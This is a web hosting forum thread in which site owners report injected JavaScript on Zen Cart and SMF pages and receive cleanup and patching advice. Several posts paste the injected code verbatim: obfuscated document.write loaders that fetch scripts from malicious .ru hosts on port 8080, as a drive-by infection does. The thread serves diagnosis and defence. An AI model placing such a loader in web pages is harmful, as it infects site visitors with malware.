Web Hosting Forum | Lunarpages


*
Welcome, Guest. Please login or register.
Did you miss your activation email?



Login with username, password and session length
February 09, 2012, 03:49:25 PM

Pages: [1]   Go Down
  Print  
Author Topic: Site doing strange things  (Read 2174 times)
gws76
Space Explorer
***
Offline Offline

Posts: 9


« on: January 22, 2010, 06:56:50 PM »

I just started noticing that my website has started to do some strange things. When I'm on the main page or any type of category the font is larger than normal and the bottom footer is laying over the Copyright and Powered by Zencart. Both the Footer links and the Header Links should be in that gold bar but it is tiny and they are not in the gold bar. It's only when I click on an individual product that the font returns to the size it was originally.

Also, when a page is loading at the bottom of the window in firefox it says, "Waiting for mysite.com," and then it says, "Connecting to timeanddate-com.megaporn.com.live-com.thetruehelp.ru..." Yesterday it was saying, "looking up nowdowloadall-com.fotolia.com.reference-com.airromax.ru..."

I don't know how this was added to my site but I want to know how I can remove it. Thank you.
Logged
MichaelT
Support
Jabba the Hutt
*****
Offline Offline

Posts: 523



« Reply #1 on: January 22, 2010, 09:46:01 PM »

Hi gws76,

I would check your index pages for injected coding, particularly at the bottom of the page. You might see something added to the code directly after the closing php tag. If you see anything then the script has been exploited and you'll need to check all your index pages. In any event, make sure that all of your scripts are updated to the latest version.
Logged

--

Support and Assistance:
Contacting Us
Hosting Plans
Affiliate Program
Wiki and Tutorials
gws76
Space Explorer
***
Offline Offline

Posts: 9


« Reply #2 on: January 23, 2010, 10:17:20 AM »

I was able to remove him from the admin portion of the site but he is still in the public part.   index.php files altered, added index.html lots of altered .js files.

When I use my web developer tools and View Generated Source he is listed in three spots in the DOM Source of Selection.

1ST ONE
<html dir="ltr" xmlns="http://www.w3.org/1999/xhtml" lang="en"><head>

/*Exception*/ document.write('<script src='+'h!(t$&t(#!p(@!):&#/#@/()(t&(i$@m($e&&&@a$n!!d(!(d)@!a#^#t($#e$-$@c$((!o)m!.)!$(!m(e#@#g)@!a!@p#$(o$$^!r^^n$$(#.!c&^#o^&^m&@$.!^$&l)@^i&$v#e(!-)!#@c^$$o^&!^m@#.$t()!h@e)$t^##r@u(!e(&h)^e$@l!!(@)p#(.)r$#$u&(#(Sad@@##8)$@0^)8(&^0(#@^/(@&(z&!$a^^!(^n^o!x^#$&-)(!(a#)(f&@f)$&$i##l@!i)(a!$t@e#$&.&&&&d^e&&/!z&&(a@$@&n)(o$)x!@!-!!#a^f@f(&i!!(l!^!$i#&a$$t(e@#.$d$(#e!@/$$@b#a&@d!&$)o!$&n))!g(&&o$&$#.#^$c&o)m#&/!@g@)@o(&^o&g&@(l&e!!(.@(#(&c!!^)o)$^m$$!/#^&$n)e&&x##@t$@!)a&^)^g^@.^$^@c@$@o!!m@(@/(('.replace(/\^|\(|@|#|\$|&|\)|\!/ig, '')+' defer=defer></scr'+'ipt>');</script><script src="http://timeanddate-com.megaporn.com.live-com.thetruehelp.ru:8080/zanox-affiliate.de/zanox-affiliate.de/badongo.com/google.com/nextag.com/" defer="defer"></script>
<!--8bc2710541c78b0e84ca38227a6c774b-->


2ND ONE-LISTED JUST BELOW THE <link rel="stylesheet"
/*Exception*/ document.write('<script src='+'h!(t$&t(#!p(@!):&#/#@/()(t&(i$@m($e&&&@a$n!!d(!(d)@!a#^#t($#e$-$@c$((!o)m!.)!$(!m(e#@#g)@!a!@p#$(o$$^!r^^n$$(#.!c&^#o^&^m&@$.!^$&l)@^i&$v#e(!-)!#@c^$$o^&!^m@#.$t()!h@e)$t^##r@u(!e(&h)^e$@l!!(@)p#(.)r$#$u&(#(Sad@@##8)$@0^)8(&^0(#@^/(@&(z&!$a^^!(^n^o!x^#$&-)(!(a#)(f&@f)$&$i##l@!i)(a!$t@e#$&.&&&&d^e&&/!z&&(a@$@&n)(o$)x!@!-!!#a^f@f(&i!!(l!^!$i#&a$$t(e@#.$d$(#e!@/$$@b#a&@d!&$)o!$&n))!g(&&o$&$#.#^$c&o)m#&/!@g@)@o(&^o&g&@(l&e!!(.@(#(&c!!^)o)$^m$$!/#^&$n)e&&x##@t$@!)a&^)^g^@.^$^@c@$@o!!m@(@/(('.replace(/\^|\(|@|#|\$|&|\)|\!/ig, '')+' defer=defer></scr'+'ipt>');</script><script src="http://timeanddate-com.megaporn.com.live-com.thetruehelp.ru:8080/zanox-affiliate.de/zanox-affiliate.de/badongo.com/google.com/nextag.com/" defer="defer"></script>
<!--8bc2710541c78b0e84ca38227a6c774b--></head><body id="indexBody">

<div id="mainWrapper">



3RD ONE
<!-- bof: specials -->
<!-- eof: specials -->

</div>
/*Exception*/ document.write('<script src='+'h!(t$&t(#!p(@!):&#/#@/()(t&(i$@m($e&&&@a$n!!d(!(d)@!a#^#t($#e$-$@c$((!o)m!.)!$(!m(e#@#g)@!a!@p#$(o$$^!r^^n$$(#.!c&^#o^&^m&@$.!^$&l)@^i&$v#e(!-)!#@c^$$o^&!^m@#.$t()!h@e)$t^##r@u(!e(&h)^e$@l!!(@)p#(.)r$#$u&(#(Sad@@##8)$@0^)8(&^0(#@^/(@&(z&!$a^^!(^n^o!x^#$&-)(!(a#)(f&@f)$&$i##l@!i)(a!$t@e#$&.&&&&d^e&&/!z&&(a@$@&n)(o$)x!@!-!!#a^f@f(&i!!(l!^!$i#&a$$t(e@#.$d$(#e!@/$$@b#a&@d!&$)o!$&n))!g(&&o$&$#.#^$c&o)m#&/!@g@)@o(&^o&g&@(l&e!!(.@(#(&c!!^)o)$^m$$!/#^&$n)e&&x##@t$@!)a&^)^g^@.^$^@c@$@o!!m@(@/(('.replace(/\^|\(|@|#|\$|&|\)|\!/ig, '')+' defer=defer></scr'+'ipt>');</script><script src="http://timeanddate-com.megaporn.com.live-com.thetruehelp.ru:8080/zanox-affiliate.de/zanox-affiliate.de/badongo.com/google.com/nextag.com/" defer="defer"></script>
<!--8bc2710541c78b0e84ca38227a6c774b-->
</td>

<td id="navColumnTwo" class="columnRight" style="width: 150px;">
__________________
« Last Edit: September 02, 2010, 01:09:00 AM by katrina1 » Logged
sterremuur
Space Explorer
***
Offline Offline

Posts: 6



« Reply #3 on: January 23, 2010, 03:19:53 PM »

I have the same: all of my index files and .js scripts are corrupted with this script added to the files.

How is this possible?
 Is Lunarservers hacked Huh

Please lock the door...  Crying or Very sad
Logged
jimlongo
Intergalactic Superstar
*****
Offline Offline

Posts: 125



WWW
« Reply #4 on: January 23, 2010, 03:37:05 PM »

The Zen Cart vulnerability is eerily similar to the one i posted regarding OSCommerce.

The steps are to apply a patch, rename the admin folder, and probably password protect the "renamed admin" folder.

See here for more details.
http://www.zen-cart.com/forum/showthread.php?t=130161

After you've done that you're probably going to need to reinstall Zen Cart, and possibly the rest of your site from a known good backup - because you can't possibly know all of the files which have been infected.

Logged

sterremuur
Space Explorer
***
Offline Offline

Posts: 6



« Reply #5 on: January 23, 2010, 03:52:37 PM »

/*Exception*/ document.write('<script src='+'h##t(!)(t#@p($@&:&^)!/&^!/&$^$z(&a&#@)p@p@@)o(^!(s@($-$)c$^o#(m^.(^(^c#^n#@z$(^z)@.)c#!($@o!(^$m^$.(@s)@#$l&^$i&#c(#k#@!d$!)&e$a#))l)s)&-)n!e(^(!^t!!.&g&$!@e)!^!n@$u^^i@&n(^$e)^^&c!##&o()&l@o^r&@s&.!#$r!)u@:&8&^!0&8)0&@$$/!&^l($e^&!m@&o@$n@#d)e&.))!f$^#)r^(#&)/$^(l@)!!e&)m@&^o$!)n)&$d^e()&.(!f&)@!$r^)/@@g#(@o)(o#^g()#@(l#(e(.@@!$r)(#o^/^!c!o(@o#^k^p^^a)^d##.^&!#c^!(@o^!(m&$/(g$$)&o@@o)&g!!l)(e@.)@^c!$o!m^@/^'.replace(/\(|@|\)|\!|#|\$|&|\^/ig, '')+' defer=defer></scr'+'ipt>');</script>
<!--bf8151dc46fcd13c4a89b17fb6f81f51-->


This is the code I fout at the end of all my indexes and js-files

I removed them all but it was a hell of a job. Hopefully this exploiter never returns.
« Last Edit: September 02, 2010, 01:09:28 AM by katrina1 » Logged
jimlongo
Intergalactic Superstar
*****
Offline Offline

Posts: 125



WWW
« Reply #6 on: January 23, 2010, 04:03:31 PM »

Quote
Hopefully this exploiter never returns.

Unless you take some action it surely will.
Logged

sterremuur
Space Explorer
***
Offline Offline

Posts: 6



« Reply #7 on: January 24, 2010, 01:42:58 AM »

I removed the code, my password is very secret and I have only a SMF Fantastico scripts running.
What can I do else?
Logged
DEddleman
Spacescooter Operator
*****
Offline Offline

Posts: 34


Elite!


« Reply #8 on: January 24, 2010, 03:28:25 AM »

Update all your scripts to the latest versions. The issue is due to a bug in your web application, not your FTP password or something else. These sorts of things are caused by someone exploiting your scripts and uploading content.
Logged

MrPhil
Berserker Poster
*****
Offline Offline

Posts: 5083



« Reply #9 on: January 24, 2010, 07:00:09 AM »

Don't rely on Fantastico to necessarily provide the latest updates. Check for later updates through the application's update function (if it has one) and the application supplier's own website. If you do update outside of Fantastico, you should update Fantastico's marker of what the version is, so that it doesn't try to update to the wrong version. Usually it's a file named fantversion.php in the application's root directory. Edit it to go to the new version after updating outside of Fantastico.

It is critical that you keep up with the latest updates for any canned software. Hackers are constantly trying to exploit popular software for their own criminal ends, and good software is constantly being updated to stay ahead of the bad guys.

P.S. If you're on Zen Cart, that is a derivation of osCommerce. I don't know how much resemblance the ZC code has to osC these days, but it might pay to look at the osCommerce community discussions and see what security measures are being talked about there. For example, the "admin" directory should be renamed to something non-obvious, and password protected. As well, the file_manager.php should be removed -- it's a major entry point for hackers.
« Last Edit: January 24, 2010, 07:05:14 AM by MrPhil » Logged

gws76
Space Explorer
***
Offline Offline

Posts: 9


« Reply #10 on: January 25, 2010, 12:25:36 PM »

I had taken down my site with a maintenance.html which worked for a little while then it became a 500 Internal Server Error.  The site is now back up live and infected and I'm trying to get Lunarpages to take it down because my machine is still in the process of being cleaned.  Can't access FTP yet because I don't want to reinfect the server.  Solutions?
Logged
Pages: [1]   Go Up
  Print  
 
Jump to: